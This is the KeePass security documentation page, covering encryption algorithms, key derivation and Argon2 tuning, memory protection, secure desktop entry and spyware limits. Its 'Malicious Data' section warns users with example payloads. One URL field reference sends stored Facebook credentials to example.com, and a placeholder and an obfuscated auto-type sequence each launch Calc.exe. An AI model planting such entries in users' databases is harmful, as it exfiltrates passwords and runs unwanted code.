 | Detailed information on the security of KeePass. |
- Database Encryption
- Key Hashing and Key Derivation
- Protection against Dictionary Attacks
- Random Number Generation
- Process Memory Protection
- Enter Master Key on Secure Desktop (Protection against Keyloggers)
- Locking the Workspace
- Viewing/Editing Attachments
- Plugins
- Self-Tests
- Specialized Spyware
- Malicious Data
- Options for Experts
- Options for Administrators
- Security Issues
Database Encryption
Database EncryptionKeePass database files are encrypted. KeePass encrypts the wholedatabase, i.e. not only your passwords, but also your user names, URLs,notes, etc.
The following encryption algorithms are supported:
KeePass 1.x:
| Algorithm | Key Size | Std. / Ref. |
|---|---|---|
| Advanced Encryption Standard (AES / Rijndael) | 256 bits | NIST FIPS 197 |
| Twofish | 256 bits | Info |
KeePass 2.x:
| Algorithm | Key Size | Std. / Ref. |
|---|---|---|
| Advanced Encryption Standard (AES / Rijndael) | 256 bits | NIST FIPS 197 |
| ChaCha20 | 256 bits | RFC 8439 |
| There exist variouspluginsthat provide support for additional encryption algorithms,including but not limited to Twofish, Serpent and GOST. | ||
These well-known and thoroughly analyzed algorithms areconsidered to be very secure.AES (Rijndael) became effective as a U.S. federal government standardand is approved by the National Security Agency (NSA)for top secret information.Twofish was one of the other four AES finalists.ChaCha20 is the successor of the Salsa20 algorithm (which is included in theeSTREAM portfolio).
The block ciphers are used in the Cipher Block Chaining (CBC)block cipher mode.In CBC mode, plaintext patterns are concealed.
An initialization vector (IV) is generatedrandomly each timea database is saved. Thus, multiple databases encrypted with the samemaster key (e.g. backups) are no problem.
Data authenticity and integrity:
KeePass 1.x Only
The authenticity and integrity of the data is ensured usinga SHA-256 hash of the plaintext.
KeePass 2.x Only
The authenticity and integrity of the data is ensured usinga HMAC-SHA-256 hash of the ciphertext (Encrypt-then-MAC scheme).
See also:
Key Hashing and Key Derivation
SHA-256 is used for compressing the componentsof the master key(consisting of a master password, a key file, a Windows user account keyand/or a key provided by a plugin) to a 256-bit key K.
SHA-256 is a cryptographic hash function that is considered to bevery secure. It has been standardized inNIST FIPS 180-4.The attack against SHA-1 discovered in 2005 does not affectthe security of SHA-256.
In order to generate the key for the encryption algorithm,K is transformed using a key derivation function (witha random salt). This prevents precomputation of keys and makes dictionaryand guessing attacks harder. For details, see the section'Protection against Dictionary Attacks'.
Protection against Dictionary Attacks
KeePass features a protection against dictionary and guessing attacks.
Such attacks cannot be prevented, but they can be made harder.For this, the key K derived from the user's master key(see above) is transformed using akey derivation function with a random salt.This prevents a precomputation of keys and adds a work factorthat the user can make as large as desiredto increase the computational effort of a dictionary or guessing attack.
Multiple key derivation functions are supported. In the databasesettings dialog, you can select one and specify certain parametersfor it.
By clicking the '1 Second Delay' button in the database settingsdialog, KeePass computes the number of iterations that results in a1 second delay when loading/saving a database.Furthermore, KeePass 2.x has a button 'Test' that performs a keytransformation with the specified parameters (which can be cancelled)and reports the required time.
The key transformation may require more or less time on otherdevices. If you are using KeePass or a port of it on other devices,make sure that all devices are fast enough (and have sufficient memory)to load the database with your parameters within an acceptable time.
Supported key derivation functions:
- AES-KDF (KeePass 1.x and 2.x):
This key derivation function is based on iteratingAES.In the database settings dialog, you can change the number ofiterations. The more iterations, the harder are dictionary and guessingattacks, but also database loading/saving takes more time (linearly).
On Windows Vista and higher, KeePass can use Windows' CNG/BCrypt APIfor the key transformation, which is about 50% faster than thekey transformation code built-in to KeePass. - Argon2 (KeePass 2.x only):
Argon2is the winner of the Password Hashing Competition.The main advantage of Argon2 over AES-KDF is that it provides a betterresistance against GPU/ASIC attacks (due to being a memory-hard function).The official specification of the Argon2 algorithm defines threevariants: Argon2d, Argon2id and Argon2i.Argon2i is the least suitable variant in our case (KeePass database file);therefore, KeePass only offers Argon2d and Argon2id.
Argon2d provides the best resistance against GPU/ASIC attacks.The resistance of Argon2id against GPU/ASIC attacks is somewhat weaker,but Argon2id additionally makes certain side-channel attacks slightly harder.
Side-channel attacks try to gain information from a system byobserving its behavior (e.g. the duration and the power consumption ofcertain operations). On servers, side-channel attacks are a real threat.On client devices (PCs), side-channel attacks are more difficult (morenoise, etc.); there are ideas how some might work in theory, but we arenot aware of any real attack in practice.For example, the attack described in the article'The Spy in the Sandbox / Side-Channel Attacks in Web Browsers'was interesting (JavaScript code was able to detect certain user interactions),but not a real threat (no extraction of sensitive data, as mentionedexplicitly in the article). This may or may not change in the future.Note that this has nothing to do with cloud storage; KeePass encrypts/decryptsa database file on a client device, and thus it is irrelevant where thedatabase file is stored (for side-channel attacks).Furthermore, there are side-channel attacks that neither Argon2d nor Argon2id(nor Argon2i, nor any other key derivation function) protects against (e.g.Spectre/Meltdown side-channel attacks, which allowspyware to read all memory).
In the case of KeePass, we currently recommend Argon2d insteadof Argon2id, because we believe that a better protection against areally existing threat (password cracking using GPUs/ASICs is stateof the art) is more important than a protection against certainside-channel attacks that may or may not become a problem on clientdevices in the future.If you worry about side-channel attacks (and are willing to sacrificesome GPU/ASIC resistance) or if you are developing a software whereside-channel attacks could be a problem (e.g. a server service thatoperates with KeePass database files), use Argon2id.
Side note: the IRTF CFRG Argon2 Internet standard recommendsArgon2id by default. For server applications, Argon2id is in generalindeed more suitable than Argon2d, but our situation (client device)is different, as mentioned above.
The number of iterations scales linearly with the required time.By increasing the memory parameter, GPU/ASIC attacks becomeharder (and the required time increases).The parallelism parameter specifies how many threads should be used.
We recommend the following procedure for determining theArgon2 parameters:
- Set the number of iterations to 2.
- Find out the RAM size of each of your devices on which you want toopen your database file. Let M be the minimum of these sizes.Set the memory parameter to min(M/2, 1 GB)(i.e. use the half of M, if it is less than 1 GB, otherwise use 1 GB).
- Example 1: if you have a PC with 32 GB RAM and a mobile phonewith 1 GB RAM (on which you want to open your database file),set the memory parameter to 500 MB.
- Example 2: if you have a PC with 32 GB RAM and a PC with 8 GB RAM,set the memory parameter to 1 GB.
- Find out the number of logical processors of each of your devices.Set the parallelism parameter to the minimum of these numbers.On Windows 10 and higher, the number of logical processors can be foundin the Task Manager (right-click onto the taskbar → 'Task Manager')on the 'Performance' tab page.
- Click the 'Test' button.
- If the key transformation takes too much time (longer than you arewilling to wait when opening/saving the database file, e.g. more than1 second), cancel it, decrease the memory parameter and clickthe 'Test' button again.Repeat this until the required time is acceptable.
- If the key transformation takes too few time (in the case of 1 GB memory),increase the number of iterations and click the 'Test' button again.Repeat this until you like the required time.
- Save the database file and try to open it on each of your otherdevices. If this takes too long on one of the devices,decrease the number of iterations (recommendation: not less than 2)and/or decrease the memory parameter, and try it again.
When clicking the '1 Second Delay' button, KeePass uses a differentstrategy for determining the parameters (relatively low values for thememory and parallelism parameters, relatively high number of iterations),because KeePass does not know the RAM and processor details of your otherdevices (the default values should be compatible with most devices).If you know these details, it is recommended to follow theprocedure above instead.
Argon2 on iOS. If you are using a KeePass-compatible appon iOS, please note the following limitation of iOS.If the app uses a lot of RAM (e.g. due to using Argon2 with alarge memory parameter), then AutoFill may not work.In this case, we recommend to use a relatively low value for theArgon2 memory parameter (64 MB or less, depending on the app and thedatabase size) and a relatively high number of iterations.
KeePassX. In contrast to KeePass, the Linux port KeePassXonly partially supports protection against dictionary and guessing attacks.
Random Number Generation
Random Number GenerationKeePass first creates an entropy pool using various entropy sources(including random numbers generated by the system cryptographic provider,current date/time and uptime, cursor position, operating system version,processor count, environment variables, process and memory statistics,current culture, a new random GUID, etc.).
The random bits for the high-level generation methods are generatedusing a cryptographically secure pseudo-random number generator(based on SHA-256/SHA-512 and ChaCha20) that is initialized using the entropy pool.
Process Memory Protection
Process Memory ProtectionWhile KeePass is running, sensitive data is stored encryptedlyin the process memory.This means that even if you would dump the KeePass process memory to disk,you could not find any sensitive data.For performance reasons, the process memory protection only appliesto sensitive data; sensitive data here includes for instance the master keyand entry passwords, but not user names, notes and file attachments.Note that this has nothing to do with theencryption of database files;in database files, all data (including user names, etc.) is encrypted.
Furthermore, KeePass erases all security-critical memory (if possible)when it is not needed anymore, i.e. it overwrites these memory areasbefore releasing them.
KeePass uses the Windows DPAPI for encrypting sensitive data in memory(via CryptProtectMemory /ProtectedMemory).With DPAPI, the key for the memory encryption is stored in asecure, non-swappable memory area managed by Windows.DPAPI is available on Windows 2000 and higher.KeePass 2.x always uses DPAPI if it is available; in KeePass 1.x, it can bedisabled (in the advanced options; DPAPI usage is enabled by default).If DPAPI is unavailable or disabled, KeePass falls back to encrypting theprocess memory using ChaCha20 with a random key; note that this is less securethan DPAPI, because the key is also stored in swappable process memory.On Unix-like systems, KeePass 2.x uses ChaCha20, because Mono does not provideany effective memory protection method.
For some operations, KeePass must make sensitive data availableunencryptedly in the process memory. For example, in order to show a passwordin the standard list view control provided by Windows, KeePass must supplythe cell content (the password) as unencrypted string(unless hiding using asterisks is enabled).Operations that result in unencrypted data in the process memory include,but are not limited to: displaying data (not asterisks) in standard controls,transferring data to/from other applications (via the clipboard, drag&drop,StdIn/StdOut, ...),replacing placeholders (e.g. during auto-type),searching data (e.g. the commands in the 'Find' menu that involve sensitive data),importing/exporting files (except KDBX) and loading/saving unencrypted files.Windows and .NET may make copies of the data (in the process memory)that cannot be erased by KeePass.
Enter Master Key on Secure Desktop (Protection against Keyloggers)
Enter Master Key on Secure Desktop (Protection against Keyloggers)KeePass 2.x has an option (in 'Tools' → 'Options' → tab 'Security')to show master key dialogs on a different/secure desktop(supported on Windows 2000 and higher), similar to Windows'User Account Control (UAC). Almost no keylogger works on a secure desktop.
The option is turned off by default for compatibility reasons.
More information can be found on theSecure Desktophelp page.
KeePass 2.x Only
Note that auto-type can be secured against keyloggers, too, by usingTwo-Channel Auto-Type Obfuscation.
Note: KeePass was one of the first password managers that allowentering the master key on a different/secure desktop!
Locking the Workspace
When locking the workspace, KeePass closes the database file andonly remembers its path and certain view parameters.
This provides maximum security: unlocking theworkspace is as hard as opening the database file the normal way. Also, it preventsdata loss (the computer can crash while KeePass is locked, without doing any damageto the database).
When a sub-dialog is open, the workspace may not be locked;for details, see the FAQ.
Viewing/Editing Attachments
Viewing/Editing AttachmentsKeePass 2.x has an internal viewer/editor for attachments.For details how to use it for working with texts, see'How to store and work with large amounts of(formatted) text?'.
The internal viewer/editor works with the data in main memory.It does not extract/store the data onto disk.
When trying to open an attachment that the internal viewer/editor cannot handle(e.g. a PDF file), KeePass extracts the attachment to a (EFS-encrypted)temporary file and opens it using the default application associated with this file type.After finishing viewing/editing, the user can choose between importingor discarding any changes made to the temporary file.In any case, KeePass afterwards securely deletes the temporary file(including overwriting it).
Plugins
PluginsSeparate pages exist about the security of plugins:Plugin Security (KeePass 1.x),Plugin Security (KeePass 2.x).
Self-Tests
Self-TestsEach time you start KeePass, the program performs a quick self-test to seewhether the encryption and hash algorithms work correctly and passtheir test vectors. If one of the algorithms does not pass its test vectors,KeePass shows a security exception dialog.
Specialized Spyware
Specialized SpywareThis section gives answers to questions like the following:
- Would encrypting the configuration file increase security by preventingchanges by a malicious program?
- Would encrypting the application (executable file, eventually togetherwith the configuration file) increase security by preventing changesby a malicious program?
- Would an option to prevent plugins from being loaded increase security?
- Would storing security options in the database (to override the settings ofthe KeePass instance) increase security?
- Would locking the main window in such a way that only auto-type is allowedincrease security?
The answer to all these questions is: no. Adding any of these featureswould not increase security.
All security features in KeePass protect against generic threats likekeyloggers, clipboard monitors, password control monitors, etc. (and againstnon-runtime attacks on the database, memory dump analyzers, ...).However in all the questions above we are assuming that there is a spywareprogram running on the system that is specialized on attacking KeePass.
In this situation, the best security features will fail.This is law #1 of theTen Immutable Laws of Security(Microsoft TechNet article; see also theMicrosoft TechNet articleRevisiting the 10 Immutable Laws of Security, Part 1):
"If a bad guy can persuade you to run his program on yourcomputer, it's not your computer anymore".
For example, consider the following very simple spyware specializedfor KeePass: an application that waits for KeePass to be started, then hidesthe started application and imitates KeePass itself. All interactions(like entering a password for decrypting the configuration, etc.) can besimulated.The only way to discover this spyware is to use a program that the spywaredoes not know about or cannot manipulate (secure desktop);in any case it cannot be KeePass.
For protecting your PC, we recommend using an anti-virus software.Use a proper firewall, only run software from trusted sources,do not open unknown e-mail attachments, etc.
Malicious Data
Malicious DataThe user should check all data that he enters and/or runs.
If you enter/run data without checking it first, this can lead tosecurity problems (like for instance a disclosure of sensitive dataor an execution of malicious code). This is a general principle;it applies to most applications, not only to KeePass.
Examples:
- The URL field of an entry supports runninga command line.So, if you (enter and) run a URL without checking it first,you might run a malicious program/code.
- When running a URL, a malicious URL override(global or entry-specific) may be executed instead, if you did not check it.
- KeePass supports placeholders.All regular placeholders are of the form '
{...}', andenvironment variablesare of the form '%...%'.All data should be checked for malicious placeholders and environment variables.- Field references can insert data ofother entries into the current data. For example, if you have a Facebook account,entering and running the following URL might send your Facebook user nameand the password to the 'example.com' server:
https://example.com/?u={REF:U@T:Facebook}&p={REF:P@T:Facebook} - The
{CMD:...}placeholderruns a command line. For example, the following URL opens'https://example.com/' and runs 'Calc.exe':https://example.com/{CMD:/Calc.exe/W=0/}
- Field references can insert data ofother entries into the current data. For example, if you have a Facebook account,entering and running the following URL might send your Facebook user nameand the password to the 'example.com' server:
- The following auto-type sequenceperforms a login and additionally runs 'Calc.exe':
{USERNAME}{TAB}{PASSWORD}{ENTER}{VKEY91}{T-CONV:/%43%61%6C%63%2E%65%78%65/Uri-Dec/}{VKEY 13}
This sequence typically only works on a Windows system, but similarsequences can be constructed for other operating systems(like Linux and MacOS). - If you specify weak key transformationsettings suggested by an attacker, this might make it easier for theattacker to decrypt/open your database.
- If you enter/use a password generatorprofile (suggested by an attacker) that allows weak passwords only,accounts using such weak passwords may not be well protected.
- Using the XML Replace feature with malicious parameters mayresult in a malicious modification of data in your database.
- Pasting/entering malicious triggers in the triggers dialog without checkingthem can result in security problems.
If the user checks the data that he enters/runs, none of the"attacks" above works. Entering data is a manual operation(i.e. an attacker cannot do this himself), and only the user candecide whether the resulting effect is intended or not.Showing warning/confirmation dialogs all the time would not be reasonable.
When opening a database that has been created/modified bysomeone else, you should carefully check all data that you want to use.If you do not fully trust the creator of the database, do notopen any files attached to entries.
Options for Experts
Most security options can be configured in the options dialog ofKeePass (menu 'Tools' → 'Options') and in the database settingsdialog (menu 'File' → 'Database Settings').
However, in KeePass 2.x, there additionally are a few security optionsfor experts that cannot be configured in the user interface.For example, KeePass can protect its process with adiscretionary access control list (DACL), andits windows can be protected against certain screen capture operations.
Activating these options for experts may result in compatibility problems andmay make KeePass unusable. Therefore, these options can only be activated byediting the configuration file manually (using an XML or text editor).This ensures that users know how they can deactivate the problematic options(by editing the configuration file once more)in order to make KeePass usable again.
If you know how the configurationsystem of KeePass works, then see thecustomizationhelp page, on which these options are documented.
Options for Administrators
Administrators can enforce certain settings, disallow certain functions,specify requirements for master passwords, and much more.Details can be found on the following help pages:
- Configuration.
- Enforced Configuration.
- Customization (KeePass 2.x),Customization (KeePass 1.x).
- Application Policy (KeePass 2.x).
Security Issues
Security IssuesFor a list of security issues, their status and clarifications, please see the pageSecurity Issues.
